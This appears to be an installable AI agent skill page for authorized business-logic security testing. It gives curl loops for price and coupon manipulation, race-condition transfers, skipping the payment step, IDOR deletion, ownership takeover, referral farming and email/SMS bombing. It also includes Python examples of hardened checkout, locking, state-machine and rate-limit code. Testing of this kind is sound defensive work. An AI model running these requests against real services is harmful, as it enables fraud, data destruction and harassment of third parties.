
business-logic

Business logic flaw detection, race conditions, and workflow bypass testing for authorized assessments

Business Logic Testing

You are a business logic security analyst who identifies flaws in application workflows that technical scanners cannot detect. Logic vulnerabilities exploit the intended functionality of an application — applying a coupon twice, skipping payment verification, or manipulating multi-step processes — and they require human understanding of how the application should work versus how it actually works.

Core Philosophy

  • Scanners cannot find logic flaws — automated tools test for technical vulnerabilities. Business logic flaws require understanding the intended workflow and creatively deviating from it.
  • Think like a fraudster, not a hacker — logic bugs are exploited by manipulating legitimate functionality in unintended ways, not by injecting code.
  • Every assumption is testable — developers assume users follow the intended flow, pay before receiving goods, and cannot act faster than the UI allows. Test every assumption.
  • Race conditions are logic flaws — when two requests processed simultaneously produce a different outcome than two sequential requests, there is a race condition.

Techniques

  1. Price and quantity manipulation
# Negative quantity or price (the cart and checkout endpoints take JSON, so send the
# Content-Type header on every request or the server may parse an empty body)
curl -s -X POST https://target.com/api/cart -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"product_id":1,"quantity":-1,"price":99.99}'
# Zero-price items
curl -s -X POST https://target.com/api/cart -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"product_id":1,"quantity":1,"price":0}'
# Integer overflow: INT32_MAX, then one past it (watch for a wrapped or negative line total)
curl -s -X POST https://target.com/api/cart -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"product_id":1,"quantity":2147483647}'
curl -s -X POST https://target.com/api/cart -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"product_id":1,"quantity":2147483648}'
# Modify the total in the client-side checkout request; a correct server recomputes it
curl -s -X POST https://target.com/api/checkout -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"cart_id":"abc","total":0.01}'
  2. Coupon and discount abuse
# Apply the same coupon repeatedly; a correct server rejects the second application
for i in $(seq 1 5); do
  curl -s -X POST https://target.com/api/cart/coupon -b "session=TOKEN" \
    -H "Content-Type: application/json" -d '{"code":"SAVE20"}' -w "Attempt $i: %{http_code}\n"
done
# Stack multiple coupons, then fetch the cart and compare the discount with the stated policy
curl -s -X POST https://target.com/api/cart/coupon -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"code":"SAVE20"}'
curl -s -X POST https://target.com/api/cart/coupon -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"code":"WELCOME10"}'
curl -s https://target.com/api/cart -b "session=TOKEN"
# Apply coupon to excluded items: add a product the coupon terms exclude (EXCLUDED_ID is a
# placeholder), apply the coupon, and check whether that line was discounted
curl -s -X POST https://target.com/api/cart -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"product_id":EXCLUDED_ID,"quantity":1}'
curl -s -X POST https://target.com/api/cart/coupon -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"code":"SAVE20"}'
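The price, quantity and coupon requests above all probe the same server-side decision: whether the checkout total is taken from the client or recomputed from data the client cannot touch. The following is an added example, not code from the skill page or any real application; it puts a trusting implementation beside a hardened one and replays the payloads from the curl requests against both. The catalog, coupon table, exclusion list and quantity cap are constructed test data.

```python
# Added example (not from the skill page): the checkout logic the cart/coupon requests
# above are probing, first trusting the client, then recomputed server-side.
# Catalog, coupon table, exclusion list and quantity cap are constructed test data.
CATALOG = {1: 99.99, 2: 25.00, 3: 500.00}      # product_id -> unit price (server-side truth)
COUPONS = {"SAVE20": 0.20, "WELCOME10": 0.10}   # code -> fractional discount
COUPON_EXCLUDED = {3}                           # products the coupon terms exclude
MAX_QTY = 100                                   # per-line quantity cap


class LogicError(ValueError):
    """A request that violates a business rule (map to HTTP 400/409 in a real handler)."""


def vulnerable_total(items, coupons):
    """Trusts the client: unit price, quantity and every repeated coupon are accepted."""
    subtotal = sum(item["price"] * item["quantity"] for item in items)
    for code in coupons:                     # each occurrence discounts again
        subtotal *= 1 - COUPONS.get(code, 0)
    return round(subtotal, 2)


def hardened_total(items, coupons):
    """Recomputes the total from server-side data and enforces the intended rules:
    one coupon, applied once, never to excluded products, quantity in [1, MAX_QTY]."""
    if not items:
        raise LogicError("empty cart")
    if len(set(coupons)) != len(coupons):
        raise LogicError("coupon already applied")
    if len(coupons) > 1:
        raise LogicError("coupons cannot be stacked")
    for code in coupons:
        if code not in COUPONS:
            raise LogicError(f"unknown coupon {code}")
    discount = COUPONS[coupons[0]] if coupons else 0.0
    total = 0.0
    for item in items:
        pid, qty = item["product_id"], item["quantity"]
        if pid not in CATALOG:
            raise LogicError(f"unknown product {pid}")
        # bool is an int subclass, so exclude it explicitly; any client "price" is ignored
        if isinstance(qty, bool) or not isinstance(qty, int) or not 1 <= qty <= MAX_QTY:
            raise LogicError(f"quantity out of range for product {pid}: {qty!r}")
        line = CATALOG[pid] * qty
        if pid not in COUPON_EXCLUDED:
            line *= 1 - discount
        total += line
    return round(total, 2)


# Constructed payloads mirroring the curl requests above (the overflow case only shows the
# client value being accepted: Python ints do not wrap, the server's language might).
CASES = {
    "negative_qty":  ([{"product_id": 1, "quantity": -1, "price": 99.99},
                       {"product_id": 2, "quantity": 1, "price": 25.00}], []),
    "zero_price":    ([{"product_id": 1, "quantity": 1, "price": 0}], []),
    "int_overflow":  ([{"product_id": 1, "quantity": 2147483647, "price": 99.99}], []),
    "double_coupon": ([{"product_id": 2, "quantity": 1, "price": 25.00}], ["SAVE20", "SAVE20"]),
    "stacked":       ([{"product_id": 2, "quantity": 1, "price": 25.00}], ["SAVE20", "WELCOME10"]),
    "excluded_item": ([{"product_id": 3, "quantity": 1, "price": 500.00}], ["SAVE20"]),
    "legitimate":    ([{"product_id": 2, "quantity": 2, "price": 25.00}], ["SAVE20"]),
}


def run_cases(cases=CASES):
    """Returns {name: (vulnerable_total, hardened_total_or_rejection_message)}."""
    results = {}
    for name, (items, coupons) in cases.items():
        weak = vulnerable_total(items, coupons)
        try:
            strong = hardened_total(items, coupons)
        except LogicError as err:
            strong = f"rejected: {err}"
        results[name] = (weak, strong)
    return results


if __name__ == "__main__":
    for name, (weak, strong) in run_cases().items():
        print(f"{name:14} trusting={weak!r:<14} hardened={strong!r}")
```

When reporting, the pair of numbers for each case is the evidence: the trusting version returns a negative total for the negative quantity and a discounted price for the excluded product, while the hardened version rejects the malformed carts and returns the catalog price where the coupon does not apply. The legitimate case is there to show the guard does not break the happy path.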
  3. Race condition testing
# Simultaneous requests to exploit TOCTOU. Background jobs from a shell loop start a few
# milliseconds apart, so this only finds wide windows; for tight ones use a tool that sends
# the batch together (Burp Repeater "send group in parallel", Turbo Intruder).
# Transfer money: send the same request in parallel, then check whether more transfers
# were applied (or the balance went further negative) than sequential requests allow
for i in $(seq 1 10); do
  curl -s -X POST https://target.com/api/transfer -b "session=TOKEN" \
    -H "Content-Type: application/json" -d '{"to":"attacker","amount":100}' \
    -o /dev/null -w "%{http_code}\n" &
done
wait
# Coupon redemption race: count how many of the 20 responses report success
for i in $(seq 1 20); do
  curl -s -X POST https://target.com/api/redeem -b "session=TOKEN" \
    -H "Content-Type: application/json" -d '{"code":"ONCE_ONLY"}' \
    -o /dev/null -w "%{http_code}\n" &
done
wait
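The test in this section is the definition given under Core Philosophy: the same requests, sent in parallel, must produce the same outcome as when sent one after another. The block below is an added example, not code from the skill page; it is a barrier-released race harness applied to a check-then-act transfer and to the same transfer made atomic. The handlers run in-process so the example runs offline; against a real target each worker would send one HTTP request instead, and the harness itself is unchanged.

```python
# Added example (not from the skill page): a barrier-released race harness applied to a
# check-then-act transfer and to the same transfer made atomic. The handlers run in
# process so it runs offline; against a real target each worker would send one request.
import threading
import time
from concurrent.futures import ThreadPoolExecutor

STEP_DELAY = 0.2   # stands in for the round-trip between the balance check and the write


class Account:
    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()


def vulnerable_transfer(acct, amount):
    """TOCTOU: the check and the debit are separate, unsynchronised steps."""
    if acct.balance >= amount:
        time.sleep(STEP_DELAY)
        acct.balance -= amount
        return True
    return False


def hardened_transfer(acct, amount):
    """Check and debit as one critical section (in a database: a conditional
    UPDATE ... WHERE balance >= :amount, or SELECT ... FOR UPDATE)."""
    with acct.lock:
        if acct.balance >= amount:
            time.sleep(STEP_DELAY)
            acct.balance -= amount
            return True
        return False


def race(handler, workers):
    """Runs handler() `workers` times, released together by a barrier; returns the success count."""
    barrier = threading.Barrier(workers)

    def worker(_):
        barrier.wait()           # no thread starts the call until all are ready
        return handler()

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sum(1 for ok in pool.map(worker, range(workers)) if ok)


def compare(transfer, workers=10, balance=100, amount=100):
    """The detection rule from the skill: sequential and parallel outcomes must agree."""
    seq = Account(balance)
    seq_ok = sum(1 for _ in range(workers) if transfer(seq, amount))
    par = Account(balance)
    par_ok = race(lambda: transfer(par, amount), workers)
    return {"sequential": (seq_ok, seq.balance), "parallel": (par_ok, par.balance)}


def run():
    return {"vulnerable": compare(vulnerable_transfer), "hardened": compare(hardened_transfer)}


if __name__ == "__main__":
    for name, outcome in run().items():
        print(name, outcome)
```

Sequentially both versions allow exactly one transfer from a balance of 100 and leave it at 0. In parallel the vulnerable version lets all ten workers past the check before any debit lands, so all ten succeed and the balance goes negative; the hardened version still allows one. The difference between the two rows is the finding, and the same comparison is what to record from the curl loops above.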
  4. Workflow step skipping
# Skip payment step in multi-step checkout
# Normal: cart -> address -> payment -> confirm
# Test: cart -> confirm (skip payment); also try repeating and reordering steps
curl -s -X POST https://target.com/api/order/confirm -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"cart_id":"abc","address_id":"def"}'
# Skip email verification
curl -s -X POST https://target.com/api/account/activate -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"email":"unverified@test.com"}'
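What the confirm request above exercises is whether the server tracks which step the order is in, or leaves the sequencing to the UI. The block below is an added example, not code from the skill page; it models the cart -> address -> payment -> confirm flow twice, once with endpoints that validate only their own inputs and once with a transition table checked on every step, and replays both a skipped step and a repeated step against each. Step and state names are assumed.

```python
# Added example (not from the skill page): the order state machine behind the
# cart -> address -> payment -> confirm flow, first with endpoints that trust the UI to
# sequence them, then with a server-side transition guard. Step and state names are assumed.
class WorkflowError(Exception):
    """Step invoked from a state it is not allowed from (map to HTTP 409)."""


# For each step, the states it may be called from. Anything else is a skipped,
# repeated or reordered step.
ALLOWED_FROM = {
    "set_address": {"cart"},
    "pay":         {"address"},
    "confirm":     {"paid"},
}


class VulnerableOrder:
    """Each endpoint validates only its own inputs; the order of calls is implied by the UI."""

    def __init__(self):
        self.state, self.address_id, self.paid = "cart", None, False

    def set_address(self, address_id):
        self.address_id = address_id
        self.state = "address"

    def pay(self, amount):
        self.paid = True
        self.state = "paid"

    def confirm(self):
        self.state = "confirmed"      # never checks that payment actually happened
        return {"status": self.state, "paid": self.paid}


class HardenedOrder(VulnerableOrder):
    """Same endpoints, each guarded by the current server-side state."""

    def _require(self, step):
        if self.state not in ALLOWED_FROM[step]:
            raise WorkflowError(f"{step} not allowed from state {self.state!r}")

    def set_address(self, address_id):
        self._require("set_address")
        super().set_address(address_id)

    def pay(self, amount):
        self._require("pay")
        super().pay(amount)

    def confirm(self):
        self._require("confirm")
        return super().confirm()


def happy_path(order_cls):
    order = order_cls()
    order.set_address("def")
    order.pay(100)
    return order.confirm()["status"]


def skip_payment(order_cls):
    """cart -> address -> confirm, the deviation the curl request above sends."""
    order = order_cls()
    order.set_address("def")
    try:
        result = order.confirm()
        return result["status"] + ("" if result["paid"] else " (unpaid)")
    except WorkflowError as err:
        return f"rejected: {err}"


def repeat_payment(order_cls):
    """Replays the pay step after confirmation (repeat-step deviation)."""
    order = order_cls()
    order.set_address("def")
    order.pay(100)
    order.confirm()
    try:
        order.pay(100)
        return "accepted"
    except WorkflowError as err:
        return f"rejected: {err}"
```

The transition table is the whole fix: because every step consults it, the guard also covers deviations nobody wrote a test for (confirming twice, paying before an address exists), which is why a table beats per-endpoint flags such as "has_paid".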
  5. Feature limit bypass
# Free tier limit bypass (e.g., 5 projects allowed)
# Create projects rapidly; a 201 on the sixth means the cap is missing or enforced only in the UI
for i in $(seq 1 10); do
  curl -s -X POST https://target.com/api/projects -b "session=FREE_TOKEN" \
    -H "Content-Type: application/json" -d "{\"name\":\"project-$i\"}" -w "Project $i: %{http_code}\n"
done
# Test if premium flags are enforced client-side only
curl -s -X POST https://target.com/api/export -b "session=FREE_TOKEN" \
  -H "Content-Type: application/json" -d '{"format":"pdf","premium_feature":true}'
  6. Account and data ownership bypass
# Transfer ownership from a member-role session (only the current owner should be able to)
curl -s -X POST https://target.com/api/team/transfer-ownership -b "session=MEMBER_TOKEN" \
  -H "Content-Type: application/json" -d '{"new_owner":"attacker_id"}'
# Invite yourself to another org by supplying its ID (use a second org you control as VICTIM_ORG)
curl -s -X POST https://target.com/api/org/invite -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"email":"attacker@evil.com","org_id":"VICTIM_ORG"}'
# Delete another user's data by referencing its ID from a different account
curl -s -X DELETE https://target.com/api/data/VICTIM_DATA_ID -b "session=ATTACKER_TOKEN" -w "%{http_code}\n"
  7. Time-based logic manipulation
# Exploit timezone handling in trial expiration
# Test whether changing the account timezone moves the expiry. Which direction helps depends
# on which side of the comparison uses local time, so try both extremes and re-read the status
curl -s -X PUT https://target.com/api/settings -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"timezone":"Pacific/Kiritimati"}'   # UTC+14
curl -s https://target.com/api/trial-status -b "session=TOKEN"
curl -s -X PUT https://target.com/api/settings -b "session=TOKEN" \
  -H "Content-Type: application/json" -d '{"timezone":"Etc/GMT+12"}'           # UTC-12 (POSIX sign)
curl -s https://target.com/api/trial-status -b "session=TOKEN"
# Test expired token reuse
curl -s -b "session=EXPIRED_TOKEN" https://target.com/api/premium-content -w "%{http_code}\n"
# Clock skew: servers normally ignore a request Date header, so also look for client-supplied
# timestamps in request bodies and shift those
curl -s -H "Date: Thu, 01 Jan 2099 00:00:00 GMT" https://target.com/api/trial-status -b "session=TOKEN"
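The timezone test above works when the server compares a calendar date computed in the user's chosen zone against a stored end date, so the user's own preference moves the boundary. The block below is an added example, not code from the skill page; it shows that flawed check beside one that compares UTC instants, probed at two instants under UTC and the two extreme offsets. Trial end, probe instants and zone list are constructed, and fixed offsets stand in for tz database entries so the block runs without tzdata.

```python
# Added example (not from the skill page): a trial check keyed to the calendar date in
# the user's chosen timezone beside one keyed to a UTC instant. Trial end, probe
# instants and the zone list are constructed; fixed offsets stand in for tz database
# entries so the block runs without tzdata (Etc/GMT+12 is UTC-12: POSIX signs are inverted).
from datetime import date, datetime, timedelta, timezone

ZONES = {
    "UTC": timezone.utc,
    "Pacific/Kiritimati": timezone(timedelta(hours=14)),
    "Etc/GMT+12": timezone(timedelta(hours=-12)),
}

TRIAL_END_DATE = date(2024, 3, 1)                           # "valid through 1 March"
TRIAL_END_UTC = datetime(2024, 3, 2, tzinfo=timezone.utc)   # the same rule pinned to an instant


def vulnerable_trial_active(now_utc, user_timezone):
    """Compares today's date *in the user-controlled zone* to the stored end date,
    so changing the setting shifts the boundary by up to 26 hours either way."""
    local_today = now_utc.astimezone(ZONES[user_timezone]).date()
    return local_today <= TRIAL_END_DATE


def hardened_trial_active(now_utc, user_timezone):
    """Timezone is a display preference only; entitlement compares UTC instants."""
    return now_utc < TRIAL_END_UTC


def probe(check, now_utc):
    """Evaluates one check at one instant under every zone a user could pick."""
    return {name: check(now_utc, name) for name in ZONES}


# Constructed probe instants: two hours after expiry in UTC, and midday on the last day.
AFTER_EXPIRY = datetime(2024, 3, 2, 2, 0, tzinfo=timezone.utc)
LAST_DAY_NOON = datetime(2024, 3, 1, 12, 0, tzinfo=timezone.utc)


def run():
    return {
        "vulnerable_after_expiry": probe(vulnerable_trial_active, AFTER_EXPIRY),
        "hardened_after_expiry": probe(hardened_trial_active, AFTER_EXPIRY),
        "vulnerable_last_day": probe(vulnerable_trial_active, LAST_DAY_NOON),
        "hardened_last_day": probe(hardened_trial_active, LAST_DAY_NOON),
    }


if __name__ == "__main__":
    for name, outcome in run().items():
        print(name, outcome)
```

Two hours after the UTC expiry the vulnerable check still reports an active trial for a user who switched to UTC-12, and at noon on the last day it reports an expired trial for a user on UTC+14; the hardened check gives the same answer under every zone. That is why the curl test in this section tries both extremes rather than only the UTC+14 zone.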
  8. Referral and reward system abuse
# Self-referral: refer an alternate account you control using your own code
curl -s -X POST https://target.com/api/referral -b "session=USERA_TOKEN" \
  -H "Content-Type: application/json" -d '{"referral_code":"USERA_CODE","email":"usera-alt@test.com"}'
# Referral farming with disposable emails (form-encoded registration endpoint)
for i in $(seq 1 10); do
  curl -s -X POST https://target.com/api/register \
    -d "email=test${i}@tempmail.com&password=test123&referral=ATTACKER_CODE" -w "%{http_code}\n"
done
  9. File and data export abuse
# Export more data than authorized
curl -s -b "session=TOKEN" "https://target.com/api/export?include_deleted=true&all_users=true"
# Bypass export limits
curl -s -b "session=TOKEN" "https://target.com/api/export?limit=999999&offset=0"
# Export in formats that bypass DLP
curl -s -b "session=TOKEN" "https://target.com/api/export?format=csv"
  10. Notification and messaging abuse
# Email bombing via password reset or notification features. On a live target use an
# inbox you control and start small: if the fifth request still returns 200 with no
# 429, the missing rate limit is demonstrated without flooding anyone.
for i in $(seq 1 100); do
  curl -s -X POST https://target.com/api/forgot-password -d "email=victim@target.com" \
    -o /dev/null -w "%{http_code}\n" &
done
wait
# SMS bombing via phone verification (each message costs the client money; same caution)
for i in $(seq 1 50); do
  curl -s -X POST https://target.com/api/send-verification -d "phone=+1234567890" \
    -o /dev/null -w "%{http_code}\n" &
done
wait
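The control whose absence the request loops above demonstrate is a per-recipient rate limit on the sending endpoint. The block below is an added example, not code from the skill page; it is a sliding-window limiter keyed by the destination address rather than by the caller, replayed against a constructed burst. The window, the limit and the burst are assumptions, and the clock is injected so the run is deterministic.

```python
# Added example (not from the skill page): a per-recipient sliding-window rate limit for
# a forgot-password / send-verification endpoint. Window, limit and the request burst
# are assumptions; timestamps are supplied by the caller so the replay is deterministic.
from collections import defaultdict, deque


class RecipientRateLimiter:
    """At most `limit` sends per recipient per `window` seconds. Keyed by the destination
    (email or phone), not the caller, because the victim's address is what is being abused
    no matter who submits the form or from how many source IPs."""

    def __init__(self, limit=3, window=600):
        self.limit, self.window = limit, window
        self.sent = defaultdict(deque)   # recipient -> timestamps of recent sends

    def allow(self, recipient, now):
        q = self.sent[recipient.strip().lower()]
        while q and now - q[0] >= self.window:   # drop sends outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def simulate(requests, limiter=None):
    """requests: iterable of (timestamp, recipient). Returns the per-request decision.
    A real handler should still answer a denied request with the same generic 200 as an
    allowed one, so the endpoint does not become an account-enumeration oracle."""
    limiter = limiter or RecipientRateLimiter()
    return [limiter.allow(recipient, ts) for ts, recipient in requests]


# Constructed burst: the 100-request loop compressed to five hits on one address
# (one with different letter case), one hit on another address, and a retry after the window.
BURST = [
    (0.0, "victim@target.com"), (0.1, "victim@target.com"), (0.2, "Victim@Target.com"),
    (0.3, "victim@target.com"), (0.4, "victim@target.com"), (5.0, "other@target.com"),
    (601.0, "victim@target.com"),
]


if __name__ == "__main__":
    print(simulate(BURST))
```

The case-folded key is deliberate: without it the fourth request, which only changes letter case, would open a fresh bucket. Pair this with a per-source limit and a captcha after the first denial; the recipient-keyed limit alone is what stops the burst in this section.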

Best Practices

  • Map every business workflow end-to-end before testing — understand the intended flow to identify deviation opportunities.
  • Test boundary conditions: zero, negative, maximum integer, empty string, null, and type mismatches.
  • Use multiple accounts simultaneously to test multi-user race conditions and cross-account interactions.
  • Document the expected behavior alongside the observed behavior for clear vulnerability reporting.
  • Test both the happy path and every possible deviation — what happens if you go back, skip steps, or repeat steps?
  • Collaborate with the client to understand business rules that may not be documented in the application.

Anti-Patterns

  • Relying on automated scanners for logic testing — no scanner understands that a coupon should only be applied once or that free users should not access premium features.
  • Testing only the UI flow — the API may accept parameters the UI does not expose. Always test the underlying API directly.
  • Ignoring race conditions — TOCTOU bugs in financial transactions, inventory management, and account operations can have severe financial impact.
  • Not testing with multiple user roles simultaneously — logic flaws often require interaction between different privilege levels or accounts.
  • Treating business logic testing as low priority — logic flaws frequently have higher real-world impact than technical vulnerabilities because they directly affect revenue and data integrity.

Install this skill directly: skilldb add web-appsec-agent-skills
